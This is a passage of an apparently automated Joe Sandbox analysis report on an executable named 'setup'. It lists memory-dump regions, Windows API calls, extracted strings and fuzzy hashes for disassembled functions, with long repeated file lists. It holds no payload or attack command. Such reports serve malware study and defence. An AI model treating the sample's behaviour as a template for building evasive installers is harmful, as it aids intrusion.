                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: VK_KHR_surface$VK_KHR_win32_surface$Vulkan: Failed to query instance extensions: %s$Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties$Vulkan: Loader does not export vkGetInstanceProcAddr$vkEnumerateInstanceExtensionProperties$vkGetInstanceProcAddr$vulkan-1.dll
                                                                                                    • API String ID: 145871493-369610246
                                                                                                    • Opcode ID: eae101333c7231a8ad70fd24abf841231120de07943f97a02c2e350bcb8857e2
                                                                                                    • Instruction ID: 51448e06e9fdac53e66eb63fd73a5c5877ec1a8c964da9b445ecb70786fc4465
                                                                                                    • Opcode Fuzzy Hash: eae101333c7231a8ad70fd24abf841231120de07943f97a02c2e350bcb8857e2
                                                                                                    • Instruction Fuzzy Hash: BA41B1B59283018FD714BF74E94536ABBE0EB41348F05483DE8888B254E7B5D8A9CBD6
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Win32: Failed to create mask bitmap, xrefs: 0024AAE9
                                                                                                    • Win32: Failed to create icon, xrefs: 0024AAB0
                                                                                                    • Win32: Failed to create RGBA bitmap, xrefs: 0024AAD1
                                                                                                    • Win32: Failed to create cursor, xrefs: 0024AA8B
                                                                                                    • |, xrefs: 0024A8E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDeleteObject$BitmapIconIndirectReleaseSection
                                                                                                    • String ID: Win32: Failed to create RGBA bitmap$Win32: Failed to create cursor$Win32: Failed to create icon$Win32: Failed to create mask bitmap$|
                                                                                                    • API String ID: 1620490831-2899190849
                                                                                                    • Opcode ID: ca76e7c9276d2b43136bb8688187718a753dacee84a7ee2e19c896133de72777
                                                                                                    • Instruction ID: 8063b5edbaa324b3b69b64e79ec65be82d25d11f4f58dff43c0fea01e9c20665
                                                                                                    • Opcode Fuzzy Hash: ca76e7c9276d2b43136bb8688187718a753dacee84a7ee2e19c896133de72777
                                                                                                    • Instruction Fuzzy Hash: FB61E0B55093418FD310EF68D68871AFBF0BB89304F00892EE8D98B352D7B5D948CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_osfhandle$CloseCreateHandleProcess
                                                                                                    • String ID: D
                                                                                                    • API String ID: 900265694-2746444292
                                                                                                    • Opcode ID: f355bcc60106bcb3155a5b155726eade8a05dba52111c76b91c70e7fc473803b
                                                                                                    • Instruction ID: e83170fcde1070b8c5b9321e087a4b95a423f04083200f03539b89294bb6209b
                                                                                                    • Opcode Fuzzy Hash: f355bcc60106bcb3155a5b155726eade8a05dba52111c76b91c70e7fc473803b
                                                                                                    • Instruction Fuzzy Hash: EB516BB05083409FE760EF69D58875ABBF0BF85344F41892DE9D887391D7BA98488F87
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?), ref: 0023C67E
                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 0023C693
                                                                                                      • Part of subcall function 00211B93: GetCurrentThread.KERNEL32 ref: 00211BBE
                                                                                                      • Part of subcall function 00211B93: SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00211BCA
                                                                                                      • Part of subcall function 00211B93: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,0023C6AC), ref: 00211BD2
                                                                                                      • Part of subcall function 00211B93: SetThreadAffinityMask.KERNEL32(0023C6AC,00000000), ref: 00211BE0
                                                                                                    • TlsAlloc.KERNEL32 ref: 0023C6B6
                                                                                                    • InitializeCriticalSection.KERNEL32(00359260), ref: 0023C6F9
                                                                                                    • InitializeCriticalSection.KERNEL32(0035BC74), ref: 0023C700
                                                                                                    • InitializeCriticalSection.KERNEL32(00357D30), ref: 0023C707
                                                                                                    • InitializeCriticalSection.KERNEL32(003577E0), ref: 0023C70E
                                                                                                    • InitializeCriticalSection.KERNEL32(003578A4), ref: 0023C715
                                                                                                    • InitializeCriticalSection.KERNEL32(0035A37C), ref: 0023C71C
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0023C724
                                                                                                    • _strdup.MSVCRT(No sound,00000000,00000000), ref: 0023C736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$Thread$AffinityMaskPerformanceQuery$AllocCounterCreateCurrentEventFrequencyVersion_strdup
                                                                                                    • String ID: BASS/2.4$No sound
                                                                                                    • API String ID: 4876088-2048376307
                                                                                                    • Opcode ID: 80d9dae50627760b6df3598f2f02bc7b15b55aa3ed7a3e84c68b75feb3ac89ce
                                                                                                    • Instruction ID: b566fc992188c28c26f50f80c82d8a51d3dae9924b06fc3a7d4d7a69a731a994
                                                                                                    • Opcode Fuzzy Hash: 80d9dae50627760b6df3598f2f02bc7b15b55aa3ed7a3e84c68b75feb3ac89ce
                                                                                                    • Instruction Fuzzy Hash: 2F1163B0959728A6C6127BB1BD0E99A7EA8EF01B52F000556F848521B2DFB48550CFE6
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDebugOutputStringThread_ultoaabort
                                                                                                    • String ID: Erro$eani$eys $for $in_k$ng u$p sp$r cl$thre
                                                                                                    • API String ID: 4191895893-1533723150
                                                                                                    • Opcode ID: 73fad2fb478e5b4c9c6d9406de47fe510be8939e2c08fc836ec99176b4f4d738
                                                                                                    • Instruction ID: fcdb2d82a145539607d62a9ebff85212172e7dcf6537a5bf88265fafb2ec0467
                                                                                                    • Opcode Fuzzy Hash: 73fad2fb478e5b4c9c6d9406de47fe510be8939e2c08fc836ec99176b4f4d738
                                                                                                    • Instruction Fuzzy Hash: 0F2117B011C7429FE728DF68D14972FFAE2EB81749F449D1CF0854A2A2C7B5CA588B47
                                                                                                    APIs
                                                                                                      • Part of subcall function 0020BAC0: InitializeCriticalSection.KERNEL32 ref: 0020BACA
                                                                                                      • Part of subcall function 0020B840: CreateEventW.KERNEL32 ref: 0020B869
                                                                                                    • free.MSVCRT ref: 001ECEFD
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001ECF25
                                                                                                    • free.MSVCRT ref: 001ECF38
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001ECF61
                                                                                                    • free.MSVCRT ref: 001ECF74
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001ECF9D
                                                                                                    • free.MSVCRT ref: 001ECFB0
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001ECFD6
                                                                                                    • free.MSVCRT ref: 001ECFE6
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 001ED006
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Deletefree$CreateEventInitialize
                                                                                                    • String ID: `-($`-(
                                                                                                    • API String ID: 2386916121-776069354
                                                                                                    • Opcode ID: 8417618d96c3313b6ec7a14e08be26150d09a4fb2e04a8a683c1da7cf703619e
                                                                                                    • Instruction ID: 6d8b2aa9e03d292aeabb4de424394f58206a477354211861ad8b14b60a5db8d2
                                                                                                    • Opcode Fuzzy Hash: 8417618d96c3313b6ec7a14e08be26150d09a4fb2e04a8a683c1da7cf703619e
                                                                                                    • Instruction Fuzzy Hash: 9B91D1B45197848FD720EF64C48979EBBE8BF88304F414D2DE9C987241EBB89558CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitlongjmpmalloc
                                                                                                    • String ID: %s$:r0$:r2$ERROR: can't alloc %lu memory bytes$pmm$pmm:%d:%s%s
                                                                                                    • API String ID: 2723687207-131848308
                                                                                                    • Opcode ID: 61a506b32a4e3ce48b08d4ca5a8ae2a3e515f728101cd1a9193de7855f6f8ce5
                                                                                                    • Instruction ID: fbbd3cb74c03cdafacc0eece921dd11664c6b4a6667e2919cb532e7b2d518c81
                                                                                                    • Opcode Fuzzy Hash: 61a506b32a4e3ce48b08d4ca5a8ae2a3e515f728101cd1a9193de7855f6f8ce5
                                                                                                    • Instruction Fuzzy Hash: C5418DB55087089BD721EF68D98166FBBE1FF84700F51883EE98897306E7749845CB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Write$CloseCreateHandlestrlenstrncmp
                                                                                                    • String ID: %INS$%ls$PATH$TALL$\
                                                                                                    • API String ID: 791122412-4221683705
                                                                                                    • Opcode ID: 2cdbd1a0e5f79966f1f2d0cb2dd9ea7adf507cf0f922967b354f45a287b1f657
                                                                                                    • Instruction ID: 45305ade8f19cca3d5d16fff1f274854370416167187b9a2602ca1a20cfa7fcd
                                                                                                    • Opcode Fuzzy Hash: 2cdbd1a0e5f79966f1f2d0cb2dd9ea7adf507cf0f922967b354f45a287b1f657
                                                                                                    • Instruction Fuzzy Hash: 084138B04083419FD321AF68D98875FBFE0FB91304F01892DE89887251E3B9D548CB93
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$Char_closeexitfree
                                                                                                    • String ID: %s$ERROR: can't close file %s
                                                                                                    • API String ID: 3661669792-2251370396
                                                                                                    • Opcode ID: ba754afb9ee74a2d37f7690f02ab5ce2a0251b9b5bf753922c04379d424d5e29
                                                                                                    • Instruction ID: 6075e42f92b4744c0f344ee60fd41330693a5b04ec78253d4134fbd7add6d117
                                                                                                    • Opcode Fuzzy Hash: ba754afb9ee74a2d37f7690f02ab5ce2a0251b9b5bf753922c04379d424d5e29
                                                                                                    • Instruction Fuzzy Hash: 8B3166B4908B419BD710BF39D98922E7BF0BF05305F45887CE8C897292DB78D886CB56
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Win32: Failed to register raw input device, xrefs: 0024ADCF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
